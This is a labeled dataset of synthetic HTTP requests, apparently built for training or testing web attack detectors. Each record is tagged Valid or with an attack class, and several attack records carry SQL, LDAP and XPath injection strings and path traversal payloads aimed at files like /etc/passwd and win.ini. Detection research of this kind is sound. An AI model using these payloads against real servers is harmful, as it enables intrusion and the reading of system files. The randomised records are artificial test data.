Referer: /goa8nn/hi2oqie/catnOie1/s8l6tdiM/r5pa.jpeg
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: terXvq1 http://www.hueuniT.net
UA-CPU: x86
UA-Disp: 086,5443,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8177x498
Via: 1.5 5.248.94.51, FTP/9.6 www.ewRare.html
Transfer-Encoding: identity
Upgrade: 7rc5/0.0
Warning: 221 www.2htoeld.css "RdAlg" 
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 699471277018
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3475
Start - Id: 5144
class: Valid
PUT /sgkCXLfFiwV1d/dtddumefn4weuhoeh/ojl6o/unacU9QdkOnX/tu/y@9NebYinG/I9Di8c.htm? HTTP/1.0
Content-Length: 59
Content-Language: 0e,tk
Content-Encoding: gzip
Content-Location: http://dmind6bt.cz/nnea/blec7z/neEr/dTuYso.gif
Content-MD5: b29wOXlucGFqaDZQbmQ1SQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Sep 08 09:57:31 UTC
Last-Modified: Mon, 27 Oct 08 07:35:46 CET
Host: www.ohyaoprUaa.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: euc-tw;q=0.8, utf-8, iso-10646-ucs-2;q=0.3
Accept-Encoding: *
Accept-Language: rrt-ggonrs20;q=0.3, ys4ta-nri, yIraRhL-od, etbil-ato;q=0.6
Cache-Control: max-age=4397
Client-ip: 107.205.220.83
Cookie: niqa07=/nee
Cookie2: $Version="7"
Date: Sun, 18 Apr 04 17:53:00 UTC
ETag: "7zbHgRNGGYItUzh9w"
Expect: 100-continue
From: uetih02p@muourem.fr
If-Modified-Since: Wed, 27 Apr 05 18:25:12 CET
If-Unmodified-Since: Wed, 29 Mar 06 08:27:37 CET
If-Match: "zjMTRPLjiGA1LwrNIl"
If-None-Match: "H4XanErrEbe2VsHELUh"
If-Range: Sun, 06 Aug 06 07:26:50 UTC
Max-Forwards: 8
MIME-Version: 5.3
Pragma: s3uWuo5y='hohs'
Proxy-Authorization: eNsit aneo7=ietstf
Authorization: Basic bnJ0dDpkaWFv
Range: 851253-34094,-44,88-5
Referer: /msslnwx/imncd/gaaenao6.gif
TE: deflate;q=0.1,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: SYigrmiwxsses8Wc
UA-CPU: MIPS
UA-Disp: 279,387,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9541x8110
Via: 3.4 108.190.181.110
Transfer-Encoding: identity
Upgrade: t9eB/4.7
Warning: 083 129.138.26.225:279 "eecehtulictwrni" 
X-Forwarded-For: 199.181.19.164
X-Serial-Number: 64870443961077
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hhwhdl=r3JKa_uQufIN&yiOlxOeiietno=e?mG&uaenaiEea=o7yobscL

End - Id: 5144
Start - Id: 35259
class: SqlInjection
GET /sQtwyWNhV-oVYVIx/cqse2laaeeefats0/McsnN2ezoneoniiwd/mbq@/7oedhvicnyftt/ounyboaoige/iMLzQ_eLnVMX4fYa.9l.exe?eIamturh=elsee&hhb=qnay%7Ct+orllf8e+7e6&utodeEetetBm7=iIEde1xZJ&nAQ6opasswdVh=2318247&tato3dnpga=c7eshesaelv&7tunty1axee0d0=OR++++%27pczlnm%27++BETWEEN+++++%27R%27++++AND++++%27T%27&iS8l8raiol=347&hmad=ho4Tt%29fiihkejnrar&nlknrJiavahi=Tsystemcds%7Cwj%24rcpnr&FaURD=62 HTTP/1.1
Host: www.LDreiniaiO.be:166
Connection: close
Accept: audio/*;q=0.3, text/plain;q=0.1
Accept-Charset: iso-8859-5, iso-8859-9, koi8-r, iso-8859-7;q=0.9, euc-tw
Accept-Encoding: compress, compress
Accept-Language: sNiwNg-e, 0Nd-amp1qw, a4u-2aoe
Cache-Control: only-if-cached
Client-ip: 149.160.7.148
Cookie: Srdeioh=s%
Cookie2: $Version="4"
Date: Wed, 13 Jan 10 05:29:28 UTC
ETag: W/"NBtBFUHwyb@U6oz"
Expect: er37ac=rtaefe;celo
From: ieogO97c@1xtO.uk
If-Modified-Since: Mon, 26 Jun 06 06:10:40 GMT
If-Unmodified-Since: Mon, 26 Oct 09 18:15:16 CET
If-Match: *
If-None-Match: "b5Iin6Q.3RF3p.tS1"
If-Range: *
Max-Forwards: 0272
MIME-Version: 3.3
Pragma: pHeo=soisHll
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: sdteoe 7etvnrw=eha2
Range: 716-,83323-
Referer: http://2v1itisd.de/qaH1ss/sla7ra1i.avi
TE: chunked
Trailer: User-Agent
User-Agent: Mozilla/2.2 (compatible; MSIE 3.3; WinNT; truafm10; sediosnAes; oods)
UA-CPU: 68000
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7179x0700
Via: wage9l/2.5 3.65.189.140, HTTP/8.9 www.iiaehtia.js, HTTP/0.7 180.7.214.179
Transfer-Encoding: deflate
Upgrade: I8j/1.5, gc9ecr/7.1
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 233.208.23.133
X-Serial-Number: 3908709
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35259
Start - Id: 38553
class: LdapInjection
GET /ttFntmPPti7-eWl8fS/n9OMR9CGTpd4/ht3EbaR/vtsnyeeoteo4A/cNSKSLF0Q2x/d@/iAsX2l6d68L6xeaMabt/0m5wmtae.tiff?n4pHnncssrvem=2&trHagre=tua&uep3sygtddmo=mnsSsds&rxaTpgEitdt3u=ma%29%28+++%7C++%28eet%3D*%29&zUs80lyefTY=1 HTTP/1.0
Host: www.iqeDd.com
Connection: keep-alive
Accept: video/*, text/*;q=0.8
Accept-Charset: x-mac-cyrillic;q=0.5, cp-936
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=092
Client-ip: 79.72.69.82
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="4"
Date: Thu, 01 Dec 05 20:03:50 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: elny
From: zttnih@4elXnnltkb.org
If-Modified-Since: Wed, 28 Feb 07 13:13:47 UTC
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: "i-3uQdIjYX_@OZpvIJP"
If-None-Match: *
If-Range: Sun, 10 Jan 10 22:54:29 GMT
Max-Forwards: 6481
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: Digest nc=3f33937E
Range: 0-592893,7-227,398-
Referer: http://www.rxelst.fr/tuatik/aSda/iWoaawt/oTrsws.gif
TE: gzip
Trailer: Transfer-Encoding
User-Agent: i1y0TSam6w http://www.esszosb.de
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: yctet/5.3 www.baBee.html:55, 9.6 124.42.107.220:05148, 6.4 63.183.149.103
Transfer-Encoding: gzip
Upgrade: rllabd/5.8, enih/7.5, Etsi/1.4, iwr/2.8
Warning: 257 www.nege.css "tabeoWaOoehrErrknae" "Fri, 05 Jun 09 24:03:11 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38553
Start - Id: 1812
class: Valid
GET /heReactun/efgtsep4dsnaoahin/eukngwvia/sYtrUsiie1ohhrE/Pbf9mM/JFlog/ewrs9ueuecaaeTwta/awvE6FHbx/Ylm7TPKBSo0uPR/nQzL6r/eonntt2einUtbLlf9/ouDnAm.png?ISDMNB4heVM=r5jsuuo9hradl&tEvahxt6e=0816&nA0bearfWos=6952 HTTP/1.1
Host: 71.128.173.157
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-1, x-mac-chinesesimp;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-age=68444
Client-ip: 112.181.5.69
Cookie: tnrs0t=rf0mrroe6;usde=bgsoundgatee4tdlI
Cookie2: $Version="14"
Date: Fri, 11 Jan 08 10:48:55 UTC
ETag: W/"0DQt6FVEumqKmQ8w"
Expect: 100-continue
From: itav@toutp6culd.com
If-Modified-Since: Tue, 23 Oct 07 06:30:00 GMT
If-Unmodified-Since: Fri, 09 May 08 23:32:52 CET
If-Match: "bvgce79sUfOnFEPMk6N"
If-None-Match: "ejUH9UITDBnFnVhe1"
If-Range: *
Max-Forwards: 0950
MIME-Version: 0.0
Pragma: ixpsl=8sndadze
Proxy-Authorization: NTLM Yzd0MGhYc25oaDhudDgwcmVhdGVublZld3VkYWFjbGlvZnQ=
Authorization: NTLM d2loWWVsZDFvV29lRXNvbzhsZW11ZmFlc2l1bmF6bm1ubXR2aDFocnRBYXMwcDU=
Range: 1-,124398-663
Referer: /srorh2s/eivgaeup/Tsor/temirOt4.dll
TE: chunked
Trailer: Pragma
User-Agent: aEsnqo9sjp (kP9TkbeF; ys6uW5f)
UA-CPU: x86
UA-Disp: 756,3724,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 912x237
Via: HTTP/0.4 www.smqHeepg.html, HTTP/0.0 www.5iEoltmq.css, hfevt/1.7 98.250.134.140
Transfer-Encoding: gzip
Upgrade: lay/1.3
Warning: 604 27.74.229.180 "uehtEmh0ejdosHSisd" "Mon, 15 Feb 10 03:04:51 UTC"
X-Forwarded-For: 71.120.203.217
X-Serial-Number: 0392549
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1812
Start - Id: 45001
class: PathTransversal
GET /eOes6rbotiessi/7i3Ob@wxK/rQkOw0QbDZ.aspx?ntlHEnEi3o=staxa0ah&lrr=jhomeqae&2MKnVtkqvI=deEhrhler&d6sellhse8Mc=433&yowdii9ygel=%25toeKcmdk+deLr&cftet=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&kewYte2o=0323239 HTTP/1.0
Host: 249.175.66.207
Connection: close
Accept: text/*;q=0.2, application/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: *;q=0.9
Cache-Control: twnd=csJnaS
Cookie: 5botiedmb1nwiHd=4374
Cookie2: $Version="13"
Date: Thu, 20 Dec 07 12:33:48 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Mon, 13 Nov 06 13:33:16 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Jun 09 13:34:27 CET
Max-Forwards: 51
MIME-Version: 1.4
Pragma: osxui='s'
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: http://nmfon5.org/n64ssl/xirbu/pYaq9i/mnkla/wpfasln.ace
TE: chunked;q=0.8,chunked;q=0.5,deflate;q=0.6
User-Agent: Mozilla/2.8 (X11; U; Solaris 5.2; wM-re; rv:7.2.4) Gecko/97763561
UA-CPU: StrongARM
UA-Disp: 6840,695,32
UA-OS: FreeBSD
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: identity
Upgrade: Eubq/3.7
~~~~~: ~~~~~~~~~~

null

End - Id: 45001
Start - Id: 29217
class: Valid
GET /cNe/eceEkdanZhk3tkw/syAqW@iq3d4UlLoQ5/g5.htm?zedtsbs=aeaT6tohTpem3&gutueaembadisri=5945&muadaEldC=eTbC.j&9apry3noat=3&Ei=csystemo&epuI0eioiiafzuo=a18C&htacceshEA5cxo@0C=wDTTCPGx&mntiph0i6I4tjz=pee7me&eqeDufhuamiutet=zaetr&atsbsmoei9e6i=53102528&je=%28ai%3Awgetitecho2oescriptpui+re&rlpeilra=91555&b3ydi=062&xtermGzFWSYuDSC=%40id&4iSyeiuliptexoE=i HTTP/1.0
Host: 100.219.108.24
Connection: close
Accept: image/*, image/gif;q=0.2, text/*;q=0.6
Accept-Charset: x-mac-chinesetrad, windows-1257;q=0.5, cp-936, iso-8859-4
Accept-Encoding: 
Accept-Language: hstt-wnOsgtra;q=0.6, eourd-mNeevrki
Cache-Control: max-stale
Client-ip: 130.2.197.25
Cookie: KhA6J8di_L5y=8sdroprIosThio;aiiCmiPeasrSm=eaefe winnthnh4n;t9feg=i4tTenndoosrfeoi;xsebrnjIhfdastw=xWBjJ;tr=4679
Cookie2: $Version="3"
Date: Sun, 26 Dec 04 10:00:25 CET
ETag: W/"etZAFCdpVXdAB-7r1"
Expect: 100-continue
From: aOsere@astiy.biz
If-Modified-Since: Tue, 23 Mar 10 11:04:21 UTC
If-Unmodified-Since: Mon, 22 Mar 10 11:25:33 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Apr 10 24:53:57 CET
Max-Forwards: 635
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: NTLM Z2Zub2FhNXJ0bkFrc21uYXJvb2x0dDBhMzVvem5lZ3RzbGVkaWxPMXdlbTh3Ymk=
Range: -4
Referer: /rMdhln/h4wz/serd/elRi.php
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: alniRonuHo
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 209x4676
Via: 3.3 192.106.139.231, HTTP/3.3 www.uLm9wbae.shtml
Transfer-Encoding: gzip
Upgrade: itc/2.5
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29217
Start - Id: 6771
class: Valid
PUT /KM@Rstdin70CG_5Y.tiff? HTTP/1.0
Content-Length: 205
Content-Language: ihvto6
Content-Encoding: identity
Content-Location: http://eEeyn.fr/eoewafr/h6iiaop3/u0mtd/eYontge.msf
Content-MD5: YXNoc2VVaHRlY2V5b3R0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Oct 07 04:40:57 GMT
Last-Modified: Thu, 30 Nov 06 15:26:13 UTC
Host: www.oxyaldrizk.st:83517
Connection: close
Accept: text/xml;q=0.8, video/quicktime;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress, deflate;q=0.1
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 166.208.84.151
Cookie: @tmplT53aCT=637783813
Cookie2: $Version="75"
Date: Mon, 02 Feb 09 15:05:45 CET
ETag: "qXmOYNfiyjf3O5R"
Expect: 100-continue
From: hgrgi@twaau.be
If-Modified-Since: Tue, 04 Mar 08 05:49:14 UTC
If-Unmodified-Since: Tue, 01 Jan 08 07:29:31 UTC
If-Match: "JbYga8vSI1hde98apWC"
If-None-Match: *
If-Range: Fri, 19 Aug 05 24:45:30 UTC
Max-Forwards: 04
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="dZssynoF"
Authorization: Basic ZG90Y2k6ZTJ0aA==
Range: -53,50110-4206
Referer: /zddoe3/lopXt/hkbsyilc/eReulal.exe
TE: gzip;q=0.7,chunked;q=0.6,chunked;q=0.0
Trailer: Range
User-Agent: wtmOu9Ccyg http://www.eocat.biz
UA-CPU: StrongARM
UA-Disp: 610,0382,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3268x616
Via: 8.9 18.134.7.38:8
Transfer-Encoding: gzip
Upgrade: wetlti/0.9, ndo/4.0, Ralc/5.4, 4tt/7.6, ogib0/1.3
Warning: 686 27.211.29.45 "sijrpot" "Sat, 10 Jun 06 10:21:01 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 830725
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e6gt6Nnao=7&ftef1rlnl7e= Asn&eiframeLyVTE3m0a4f=?hl<aier&tbde3= ?(Tes<e|+ntoimgRer&motTcrfgtr=5574571&4JvarN1Jg.o=e9m35wct+ltg&eiiy3sftco=396114758&GqrmChkNe=8ateisesoh&rvnix=agidh7iio9Yoac

End - Id: 6771
Start - Id: 9987
class: Valid
GET /aT3aao3hom/inn-cjGDbpG/r2MR9h-z-NaPaa0q71/tewRwtUpvQzofgxDo/bsbeOmdnRiddr/i-o6zkmCLb/odsmYWN1_26N/nqHWM6SphIj/rptmcsutrse/as3tsetulras/ihQqZ/h5sVxOL@aSdvarVz6.php4? HTTP/1.0
Host: 128.200.79.67
Connection: keep-alive
Accept: application/rtf, video/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sa-Mta;q=0.2, E-ay, fe-nnmobsa, tT-lur;q=0.9
Cache-Control: min-fresh=899
Client-ip: 41.19.16.178
Cookie: nNzxawe5l=ui;GKl00MG=7b2ypfism4wt;crHnrtbi=?aie/rd gdso;ylielO=sXy0@9jV
Cookie2: $Version="25"
Date: Mon, 23 Feb 04 22:43:50 GMT
ETag: W/"Xm_AbeCBSRCOVhv_Iyj2"
Expect: hfta3e
From: wsO7end1@rfmr.fr
If-Modified-Since: Mon, 31 Dec 07 06:49:46 GMT
If-Unmodified-Since: Wed, 18 Apr 07 18:23:37 GMT
If-Match: *
If-None-Match: "XIhqkhp18lo.6pbu"
If-Range: Tue, 26 May 09 09:19:57 CET
Max-Forwards: 21
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: adE2 tucxsisy=rg2o
Authorization: Basic ZGhsMjk3cDpiZzBjMg==
Range: -96
Referer: http://sb1hh.biz/oesnehoa/neoien/liho/ksencyi.mspx
TE: gzip;q=0.2,gzip;q=0.5
Trailer: User-Agent
User-Agent: Mozilla/9.2 (compatible; MSIE 8.5; Linux i586; eief7)
UA-CPU: MIPS
UA-Disp: 0205,052,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6267x971
Via: HTTP/3.6 www.lInankUy.jpg, eeidm/4.5 253.100.33.86, ihele5/8.9 www.es8tugiw.htm:189
Transfer-Encoding: compress
Upgrade: b2bhql/3.8
Warning: 190 96.212.144.39 "6eoaBieotasga" 
X-Forwarded-For: 48.85.205.201
X-Serial-Number: 7198158285326670
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9987
Start - Id: 46066
class: PathTransversal
GET /e6wslorso2geAG6t/6s9roesrsnaaGin3or.mspx? HTTP/1.0
Host: www.Onao0.net
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Cache-Control: no-transform
Cookie: aqrotr=/etc/passwd
Date: Sun, 21 Mar 04 14:58:03 UTC
If-Modified-Since: Sun, 15 Jul 07 12:16:51 GMT
If-Match: *
Max-Forwards: 3
Range: 4288-,-145118
Referer: /8hFDssr.gz
TE: gzip;q=0.5,trailers
User-Agent: tflJhi
Via: 8.7 226.58.106.58:4674, 8.3 www.ejife.shtml, 2.0 www.anpu.jpeg
Transfer-Encoding: deflate

null

End - Id: 46066
Start - Id: 4868
class: Valid
POST /mzBLtGlVG/aGvOG-Np/crlB/rhint.cfm? HTTP/1.1
Content-Length: 249
Content-Language: to
Content-Encoding: compress
Content-Location: /lIOon.png
Content-MD5: c3JMZXNkbmNBb3JpZXNueQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Mar 10 07:23:24 UTC
Last-Modified: Fri, 24 Sep 04 16:41:33 GMT
Host: www.t5hoazeg.biz
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: euc-kr, x-mac-chinesesimp
Accept-Encoding: deflate;q=0.7, deflate, gzip, identity;q=0.8, deflate;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.131.26.158
Cookie: .sg6=50049;ntlasuhctnn=ta;lnqnocum7p0cb=thlTsep6a5;KA0aAr=Aooahjbgunct
Cookie2: $Version="272"
Date: Mon, 29 Jan 07 19:00:10 GMT
ETag: W/"0rK@TxZzgm@dZG0@"
Expect: Fsehcm
From: ldlf@yhitii.org
If-Modified-Since: Tue, 20 Jul 04 05:46:55 GMT
If-Unmodified-Since: Tue, 11 Aug 09 19:31:26 CET
If-Match: "ywbi0OIRPD5wiVtIj1oP"
If-None-Match: "f_cjXDlLitL8gyT8oj3"
If-Range: *
Max-Forwards: 5157
MIME-Version: 7.7
Pragma: 7hsacaU=g
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic bEVleG5hbmE6YWloZw==
Range: 09264-,-3
Referer: /iIohe/h4eear/uFrzetu.cfm
TE: trailers,chunked;q=0.1,chunked
Trailer: Range
User-Agent: idt29om1rwO5elmtE8s
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 931x5037
Via: 7.6 154.53.27.186, 6.5 134.67.82.171, FTP/9.7 www.e0enhdsy.html
Transfer-Encoding: efochA; 7qamUs=nyotie
Upgrade: rt3e/2.9, rga/0.4, wbbt/8.3
Warning: 099 240.84.51.91:5325 "hIxWeR3owro3mogEtyrt" 
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

opo3tkntdu=iSaltmp&aeubthlRoVuditf=t(t&2eagiorcrSt0E=0emvozgwH&me=1474&5rKiFpb0Ht=543&hqAt6hyu2ie1lt=6846&na=o87zao0yne&oni7esuttaa=lia9Roo9Eiframepasswds(hsaln&oSsr3bfdhef=osat3eOehlt&po5gMYEsock_streamuvi=36140258&bf38e=9eab&ld=yai8&fsthy=hstn

End - Id: 4868
Start - Id: 14850
class: Valid
GET /xwgetLEPw/arkgastetb/is-QInmu/c9lrw/h4su7uas6gy/ttirvledjcanv0exiy/px3a1/NPexecoptftpyVQANo-/ihatAi/fHLWz4B2afNVgr/EMtWk0jIPATLlocationJ/Lrxthstuamec.js?rmdzzc=%3AA&c5gneE=qluSSteqoria HTTP/1.1
Host: 178.74.224.76
Connection: close
Accept: audio/basic;q=0.8
Accept-Charset: iso-8859-8-i;q=0.2, koi8;q=0.2, euc-kr;q=0.4, utf-7, hz-gb-2312
Accept-Encoding: compress;q=0.0, deflate;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 203.219.108.148
Cookie: hONea=14;XdktF1O=<i6eo:tlelO;hbhpEwdP=tdVC-6Or;aA=r1yn;04mhbFjyot=6]nC[@Dorsbg9wh;tAdelhce=9
Cookie2: $Version="4"
Date: Tue, 25 May 04 12:30:46 CET
ETag: W/"Jrh_doB3SiN0uka6@"
Expect: 100-continue
From: doomanl@8w3rc.it
If-Modified-Since: Fri, 15 Sep 06 05:09:44 GMT
If-Unmodified-Since: Mon, 27 Oct 08 14:06:46 CET
If-Match: *
If-None-Match: "BVSUCb6G92_J3Dp"
If-Range: Tue, 20 Jul 04 13:06:56 UTC
Max-Forwards: 989
MIME-Version: 8.0
Pragma: y='6cu1uoyp'
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: NTLM c0RlbmEyaG5iMmhlZW5IYXVic25vcGJvZXJkaWxwaHZlQ2VoY3Q5aG9BZ2ZlMg==
Range: 974110-
Referer: http://t3sho.org/asxnb/beg3Nn/qnAESrho.gif
TE: trailers
Trailer: Max-Forwards
User-Agent: erqcin (pOjY4E)
UA-CPU: 68000
UA-Disp: 3034,218,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 923x8805
Via: 8.6 32.240.184.178, FTP/4.5 www.Ao4rt0iw.css:115, 2.8 152.83.155.73
Transfer-Encoding: compress
Upgrade: orhoc/2.2, Sguidv/0.2, 9Hz/1.4, Qxua/9.4
Warning: 396 135.99.201.170 "ensfieereprG" 
X-Forwarded-For: 175.103.200.117
X-Serial-Number: 89813
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14850
Start - Id: 36205
class: PathTransversal
GET /.nsf/../winnt/win.ini? HTTP/1.0
Host: www.tunxweee.gov
Connection: Hnse
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 76.158.230.163
Cookie2: $Version="3"
Date: Thu, 24 May 07 03:43:55 GMT
Expect: 100-continue
If-Modified-Since: Fri, 18 Jun 04 21:07:23 UTC
If-None-Match: *
Max-Forwards: 691
Pragma: eehlUt6=3
Authorization: Basic ZGRhaGVlbTo4c3RlaA==
Referer: http://ort0pe.com/qaeUnr0/t340xe/ucmtnaec/nd0n/whz2stt.mspx
TE: trailers,trailers,gzip
Trailer: Accept-Language
User-Agent: TebtedpdlaEtgtbsw
Via: 1.7 www.sqetltr.jpg, 5.3 www.borc.jpg:33

null

End - Id: 36205
Start - Id: 18980
class: Valid
GET /o-1i.rYmTx0Dvx/tkinrr/FqTJIUxFKKtmpxn.js?cIs=89186460&6fasdte7qeo6=%26Oays8&hthcoiin=c7ceM HTTP/1.0
Host: www.meelHo.uk:80
Connection: keep-alive
Accept: video/*;q=0.7, application/*;q=0.7, audio/*;q=0.3
Accept-Charset: iso-8859-9, x-mac-hebrew
Accept-Encoding: deflate, compress;q=0.7, deflate, compress;q=0.3
Accept-Language: *
Cache-Control: max-age=24991
Client-ip: 193.71.188.123
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="652"
Date: Mon, 13 Aug 07 14:07:19 GMT
ETag: "1LxG-41DxiNy9.n8Y-m"
Expect: ffrDndup
From: l14gyjst@isddra.be
If-Modified-Since: Thu, 04 Jun 09 22:56:02 UTC
If-Unmodified-Since: Wed, 22 Apr 09 04:13:25 UTC
If-Match: *
If-None-Match: "58DP5GHA4AJJvJG"
If-Range: Tue, 08 Sep 09 08:41:00 GMT
Max-Forwards: 86
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM a1RjaG9ib2pudDZvdGpDUjRhYWl4cnBpZWVydGtlc3Uz
Authorization: Basic bnlpMjp0NW50ZmY=
Range: 63-4,19-3,96935-
Referer: http://Dcroexik.be/sonEl0.txt
TE: gzip;q=0.9,trailers,chunked;q=0.0
Trailer: Accept-Encoding
User-Agent: aNuohb3e
UA-CPU: 68000
UA-Disp: 2989,0086,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 378x534
Via: 7.3 113.141.185.52
Transfer-Encoding: gzip
Upgrade: tre/5.6, eMW/5.6, erle/4.7
Warning: 319 www.seEeeme.shtml:62 "entaH6oantt2mash" 
X-Forwarded-For: 166.105.2.220
X-Serial-Number: 27260320301
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18980
Start - Id: 49526
class: XPathInjection
GET /o5saEhgsHch.css?i9azdPth=0rfyyXei%27+++or+count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28+%29%3D%28%28+i+%2B+j+%2Bk++%2B++l++++%2B++1%29%5D+%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++++%27ehzida%27%3D+++%27++++tzexssgi%27+++or&SuRarnmakgn7bx=dssrYe0nsrnba HTTP/1.1
Host: 35.166.107.109
Connection: eFan
Accept: */*
Accept-Charset: iso-8859-9, windows-1255, x-mac-roman;q=0.4, cp-936, koi8-r
Accept-Encoding: compress;q=0.6, compress, identity;q=0.1, identity
Accept-Language: *
Cache-Control: max-stale=557
Client-ip: 91.134.19.242
Cookie: tARA5ws=rxssuEfdhoEansk3d;timtruaWvme= 3n&|3include:nexeccet:
Cookie2: $Version="870"
Date: Fri, 03 Aug 07 18:39:59 CET
ETag: "pUBVRGni3kIAQ_BM_qDc"
Expect: Set5qe
From: jwtneu@uosy.be
If-Modified-Since: Sun, 12 Apr 09 20:51:59 UTC
If-Unmodified-Since: Tue, 09 May 06 03:54:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.3
Pragma: rsoeut='5at'
Proxy-Authorization: ae9cy3 mcawsh6=6imqoMWi
Authorization: NTLM c2RlbGl0Y1NObHJ0bmljZVVhdG5nbmxpaE5zZHNUbW9naTVlb25ubg==
Range: 72-,357-,72130-42
Referer: /lutonobr/3U0o/rpxeU.wmn
TE: deflate;q=0.5
Trailer: Trailer
User-Agent: 5rsp4ee/0.3.3.6
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5470x3164
Via: FTP/9.8 1.93.204.175
Transfer-Encoding: eetfro
Upgrade: 2ao/4.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 4596241823364339
----: --------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49526
Start - Id: 15849
class: Valid
GET /rKIPX/eJpDD6M/n2N5W8.k8MG/ern8cedmecr/y13p@mxVH0/ddw/n9hys/ayWXXz/iFY_9k7.jpeg?oeJe=hr+&s0dO=calESy2yUz HTTP/1.1
Host: 12.231.157.180
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.9, deflate, deflate;q=0.0
Accept-Language: *
